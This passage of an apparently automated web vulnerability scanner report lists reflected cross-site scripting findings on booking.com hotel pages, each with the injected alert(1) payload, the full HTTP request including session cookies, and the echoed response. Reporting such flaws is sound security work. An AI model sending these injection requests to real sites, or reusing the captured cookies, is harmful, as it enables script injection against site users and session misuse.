Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:16:52 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55612
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/hotel/usc6994"><script>alert(1)</script>e9338c63c3f/c-boston-massachusettes.html" />
...[SNIP]...
4.166. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5c4c'%3balert(1)//e6bb002832a was submitted in the REST URL parameter 3. This input was echoed as f5c4c';alert(1)//e6bb002832a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.htmlf5c4c'%3balert(1)//e6bb002832a?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:17:02 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGHIh9BErcQ1%2FkrlZ%2F9oDW%2FyEe48HaesU3wI%2BbzIHxfznE769fiF%2FCbsJ%2FzBHHyNu%2BqPjHkeCqhSqKzvlA8dk%2BQY%2FzuhXkWC5jbQPlecoXiOU35n6HKiYTUUarDZZPFteBVsLhORH8gt2ij9WdRS81UtxYJbZWXX3yoxQ6UtIlMT3D3N%2BLnfzDXeDvXGpJB%2B%2FgS%2BFDtlpTsB%2FIXCt6kncPlpG6DxDYnjZf7mmbvqmA%2BpUc8zaU45L2k2resNOe9wjE8SsbQd6oQ1bkdwFaEwBlzQUE9foKtudJ0IdM%2ByaOCN1FiyAWhge%2BzZVTPWeNiMtRvr2ipw8hteSuByZzbb%2BhjkMzYU3uzRivXXiZ%2BnBiQAzTYc1r87b37LJifna%2B3fUzDPKGqOjrgK3UfIzibE08fwjHT5vB2gRAZhdKyoS%2BywwIdMOxiYfaAev99ZfubNnezo8oWzzXT%2Foon54JHNRzi9sZGgl3LW8tjiuSiUslX6M2%2BQv7TfUh4X2QFerhpx5aP6QSLziWIyqr4DVU75oAy0e4AN1ZlqRCDYp09SnuS9M1%2FWlVdG9uafeOkB1Knu%2FQdc10Tr9PhKKRDa6tTDkDEKVtAatN6fezvq73FH%2FIf7bfGNHjkoAoxZEILFIh6ZZF9dw7cJKD4r7LoFvrlIcuMSSYIWXi3b%2FT93rE2Op4Sya3evnIadIB0W%2BMZKR%2F8zCY6uo6WQLphosid4r0mmLVcNxRZuuXbj%2FQ8CTJ8F9vnaIRmxpux%2BS2ZnY6Fgcwy%2FJotMELa0stQnIZ9Q%2Fbse4d%2FBIciiqnqWavRL6OPjGXmvxKMX5KG2rPrnZT28MN0dEaQaWI3yGGXIb%2BE2Y9JZkhw76LfCxIwqyIoj%2B57lYJ2GtwlFHgM7uhQYCtczPibCsB6TB%2FDAnI2%2B8TnlfF3o8PveyfHUktjntIFNY7d0hR%2FsmCBRuqRRsPi6k9DttC73hlLheP7Atz5OlxIf98lMJG%2FuZJeVNKCyj7SjcI96zzuJ8xsvgoHzTvO%2FasP6BfGrxdAH0TSqjH5BbUQkGe7IpSGBe3gf6wTER%2BnXskp%2FSdvn9M9R9PMuJeQBIpPqudvD6ksIU548FqjwjKHcGEeoeo4%2FN4NRIWieQE0rbnlskfvDsjr7WxN%2Be1h%2FzV8wch0GbWx6fvaW4eosdokHLy3QLP9tqwULH6fWfxwcSSJcRhUjC8PCYShh6MEu8syi7SWiFDZvE%2BMzKj9k3wrOpF3UBMfRBOO5VC1PndOdnzwTJmKIyB9FMd3q7THgF7Nl1xahrFq%2FB1MO47ALc13oHqLQ9sbpQ9HJGTzHKVi3OR7aiBmxRl9kWxkBMHp9ePLKSJid4lXI2synxSn9Hx4kCqIZd3UQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:17:02 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55537
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/c-boston-massachusettes.en.htmlf5c4c';alert(1)//e6bb002832a?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'R
...[SNIP]...
4.167. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c9d3"><script>alert(1)</script>a89d45ffd1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html5c9d3"><script>alert(1)</script>a89d45ffd1e?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:16:59 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGHIh9BErcQ1%2FkrlZ%2F9oDW%2FyEe48HaesU3wI%2BbzIHxfznE769fiF%2FCbsJ%2FzBHHyNu%2BqPjHkeCqhSqKzvlA8dk%2BQY%2FzuhXkWC5jbQPlecoXiOU35n6HKiYTUUarDZZPFteBVsLhORH8gt2ij9WdRS81UtxYJbZWXX3yoxQ6UtIlMT3D3N%2BLnfzDXeDvXGpJB%2B%2FgS%2BFDtlpTsB%2FIXCt6kncPlpG6DxDYnjZf7mmbvqmA%2BpUc8zaU45L2k2resNOe9wjE8SsbQd6oQ1bkdwFaEwBlzQUE9foKtudJ0IdM%2ByaOCN1FiyAWhge%2BzZVTPWeNiMtRvr2ipw8hteSuByZzbb%2BhjkMzYU3uzRivXXiZ%2BnBiQAzTYc1r87b37LJifna%2B3fUzDPKGqOjrgK3UfIzibE08fwjHT5vB2gRAZhdKyoS%2BywwIdMOxiYfaAev99ZfubNnezo8oWzzXT%2Foon54JHNRzi9sZGgl3LW8tjiuSiUslX6M2%2BQv7TfUh4X2QFerhpx5aP6QSLziWIyqr4DVU75oAy0e4AN1ZlqRCDYp09SnuS9M1%2FWlVdG9uafeOkB1Knu%2FQdc10Tr9PhKKRDa6tTDkDEKVtAatN6fezvq73FH%2FIf7bfGNHjkoAoxZEILFIh6ZZF9dw7cJKD4r7LoFvrlIcuMSSYIWXi3b%2FT93rE2Op4Sya3evnIadIB0W%2BMZKR%2F8zCY6uo6WQLphosid4r0mmLVcNxRZuuXbj%2FQ8CTJ8F9vnaIRmxpux%2BS2ZnY6Fgcwy%2FJotMELa0stQnIZ9Q%2Fbse4d%2FBIciiqnqWavRL6OPjGXmvxKMX5KG2rPrnZT28MN0dEaQaWI3yGGXIb%2BE2Y9JZkhw76LfCxIwqyIoj%2B57lYJ2GtwlFHgM7uhQYCtczPibCsB6TB%2FDAnI2%2B8TnlfF3o8PveyfHUktjntIFNY7d0hR%2FsmCBRuqRRsPi6k9DttC73hlLheP7Atz5OlxIf98lMJG%2FuZJeVNKCyj7SjcI96zzuJ8xsvgoHzTvO%2FasP6BfGrxdAH0TSqjH5BbUQkGe7IpSGBe3gf6wTER%2BnXskp%2FSdvn9M9R9PMuJeQBIpPqudvD6ksIU548FqjwjKHcGEeoeo4%2FN4NRIWieQE0rbnlskfvDsjr7WxN%2Be1h%2FzV8wch0GbWx6fvaW4eosdokHLy3QLP9tqwULH6fWfxwcSSJcRhUjC8PCYShh6MEu8syi7SWiFDvaIVgA5BfeSy2UWOh8LZcsW3jRnqrEt5L5VvgL6yB67t6sby%2Frlgcz4bVLGz3RhdvNdc8%2FQ9kXtQ%2BfDSp63ux4asp6TQnVYUrU1Xhansf%2BKObojl%2Bi1aHA%2BDyO1osiIAB45KYAq4BulQjgvQL1Gg%2Fg%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:16:59 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55612
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/hotel/us/c-boston-massachusettes.html5c9d3"><script>alert(1)</script>a89d45ffd1e" />
...[SNIP]...
4.168. http://www.booking.com/hotel/us/c-boston-massachusettes.html [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1797e</script><script>alert(1)</script>a62ba1e608e was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=3238041797e</script><script>alert(1)</script>a62ba1e608e&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:11:39 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdYNcX2CBa26JnwhiZtnPf7CTU4Xq874S7cKvMNITsisTkZBKlazkRsQ4mh19Qvn5AJXh%2Fp1wiOeiPMeJbQUxkSGN5%2FV4%2FAHSVB7IHBrlugF36lNfV8gSdmQvTYooCEmZAxx3pnyomeugtYa1%2BYzrNSI9BqaUXmwvvk7nKxGK8j8CHyUfGApe%2FX3DiKcjzsCtPHQJvfVs8K3zebLDTjtD9s%2Fh4B6AWeSkOhJPAU9PEvNcqB5MiIqEbRDloelJLdfvAvkT4Q2Ja3jzI7vPUc8T2Hi5Q5HQ5qTEuD5AB%2B7GUYNpUraKpRTGjdQG7dHzo1ICMah34TMooX2PdhHz%2FvXN%2B6Ff6BHglaX1t8XytIqCD5x6cwrxf5UITAoVX0IPUrwX3srzm9lmAg0Zxq3n%2BkVI%2Fq5CUFxGXZFVGpPvm4g6rcqQMFtosOaezHfE76EzvlOnks0xva9PuWZbS19muiyZKDXwAI%2BsygaYXf5oe38lZtISUm1WTLvq70Wz%2B7GaqseUzwdL1maVJnzwHRH2tS9o3vE2WvXVLhDdmuXVPtJ9ZtBMo3HcODmUm%2Fv26T3pxvjVXp%2FAkKkUrNQeCdDVi3LfsEvgN5fqdNRLlufUTO3jEuJP3n0PwqbB5xfNtPCfnZfLQrakhc0%2BtpEYPYLe8VzCaGP%2BBdOM1STJEwYtJnlxGrVtshNaUS3nRnTYaiTdsEir4sy9x%2FwMudYqhMO1nHviBcnNIX5fgA9sDgM4q0pGczHj0t97TCurvu3DeVEm83FZeM62LjCcwMR80HzTPsbFBGsK1lbZxYaF4vaCWO%2FwA1D68gQ2kM9nGtROALbCtqPznoC22OjM2mL5cjMJuCuDDose%2F%2F7aOJXY8pCHq1fexIqqssbWUfmy5NTaIIvEip7k7O9Ui3gQhzFd1HSqmYfilcjsCdTkLVVkzAxdBakqSTn%2FlpYkFfSak8dNqiNIgfcFInmijc6%2BugbSC%2BptoAkWxRuEP%2BtLEfDhj0eLm3%2F%2B9iAwIIUg69kS01qdO2cmepWWUd5VWrVgUQo5Oskmz2OOe8QXbLo4QZrtcvYtuZij%2FzrL3drCCeJN5t5QxoSxCAPrNte8cKI6YB2Z6LRx3aPukOsIGxC0H4pF9Wz5JMbHWYfoKJlt%2Bnj7HA6EUvj%2BSCe2u11ibmk%2FzAKtjwPYSXm7yAyXzJXmrW8l9RqBtdOAIEsaQSY8IZ%2FP48AL6yQnE0KFtSDhXo9RX6cN%2BW6aUnrDAthwouXQswTfsJpGhX2v0QcCsZXBexcJJphcSuej3fFDV6O93mjPE3HNhPDeRJ8LP5m3hbM%2BrMJ%2B04d6E7QpUjdHK3aQHSZR%2FlrOrDFOiI6KmFYYUOQ%2FZidzZ0xPNm6PmA%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:11:39 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 228648
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ag_to_suggest" : 'us',
"b_fb_id" : 'FB_text',
locale_for_facebook : 'en_US',
b_domain_end : '.booking.com',
b_original_url : 'http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=3238041797e</script><script>alert(1)</script>a62ba1e608e&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_
...[SNIP]...
4.169. http://www.booking.com/hotel/us/c-boston-massachusettes.html [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

